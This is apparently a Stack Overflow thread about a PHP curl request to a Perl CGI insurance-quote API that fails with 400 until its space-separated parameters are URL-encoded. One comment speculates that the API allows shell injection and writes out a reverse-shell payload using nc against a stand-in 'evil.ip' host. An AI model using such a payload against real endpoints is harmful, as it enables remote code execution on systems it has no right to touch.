# How to get the response of Perl Post from Curl PHP

Tags: php, perl, curl

Good day! My client gave us an API endpoint where the response is XML when you pass in some commands, I would like to know if there's a way where we can run the endpoint in the PHP and get the response back, I have tried using PHP curl but the response shows 400 or bad request. I can access the endpoint with the commands/parameters in the URL browser so it works. But when I try it using curl, there is no response in it. Is this possible, or am I doing something wrong with my code?

```
$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => "https://www.winquote.net/cgi-bin/compete.pl?dc=-cv1.5 -ccca -qt0 -pccaXXXXXXXXX -rt0 -dob11061992 -gen1 -rR -fa500000 -pg0 -pi4 -lc1 -pm0 -rc0 -rop0 -langen -fmt -ceilp -faEXACT",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST"
));

$response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
  echo "cURL Error #:" . $err;
} else {
  echo $response;
}
```

Comment: Since you are getting '400 Bad request', there may be chance you are missing or proving wrong 'key' in your request body. Are you sure all the query parameters are correct ?

Comment: I am no PHP expert, but looking again, is that the correct way to pass query param in curl ? http://agichevski.com/2014/01/21/php-curl-post-and-get-methods/ . You should have '&' between them

Comment: @Maverick you're right on the second point, that is NOT the correct way to add url parameters, and his url is invalid. if you read section 2.1 of [RFC3986](https://www.rfc-editor.org/rfc/rfc3986.txt), you'll find that the spaces in his url actually has to be encoded as `%20` - but it isn't. the correct way to add them in PHP is by using the urlencode() or rawurlencode() or http_build_query() functions..

Comment: @hanshenrik  Yes I know it is not the correct way to add url parameters, the documentation sucks that's why I just tried accessing the endpoint directly at the browser. Here's a documentation they gave us  [Documentation](https://www.winquote.net/signup/rn/WQ-ServiceAPI-SL-XML-1.5-CA.txt)

Comment: @Maverick sorry for the late response, Yes it is correct because I can access it directly when I type it in the browser's URL you can check the image here [Browser response](https://irt-cdn.multiscreensite.com/73389760d5654f76a6bb8be8bd19f192/dms3rep/multi/winqoute.png)
 The commands are PERL parameters equivalent in PHP I guess?(-cv1.5 -cedv1.0.16.10.11 etc)

Comment: is it just me or does that api look vulnerable to shell injection / remote code execution? wonder what would happen if you ended that command with `(space)& nohup nc evil.ip 4444 –e /bin/sh`

Answer (score 3):

Have a look at [White spaces in postFields in PHP Curl](https://stackoverflow.com/questions/10246734/white-spaces-in-postfields-in-php-curl) which may answer your question.

The only issue here is the query param are not proper and '400' response is saying you so. In browser you you look the spaces are converted to '%20'.The browser has done that work for you. You have to do the similar thing i.e. encode your query parameter because of the spaces before doing the post request.

From https://curl.haxx.se/docs/manpage.html#--data-urlencode

> --data-urlencode
>
> (HTTP) This posts data, similar to the other -d, --data options with
>   the exception that this performs URL-encoding.
>
> To be CGI-compliant, the  part should begin with a name followed
>   by a separator and a content specification. The  part can be
>   passed to curl using one of the following syntaxes:

Comment: for the record, that translates to: ```CURLOPT_URL => "https://www.winquote.net/cgi-bin/compete.pl?dc=".rawurlencode("-cv1.5 -ccca -qt0 -pccaXXXXXXXXX -rt0 -dob11061992 -gen1 -rR -fa500000 -pg0 -pi4 -lc1 -pm0 -rc0 -rop0 -langen -fmt -ceilp -faEXACT")```  (and no, it does not translate to urlencode(), it translates to **raw**urlencode())

Comment: @Maverick will try that out! Thank you for the information

Comment: @hanshenrik I will try that as well thanks for the info! Will try your suggestions and get back to you!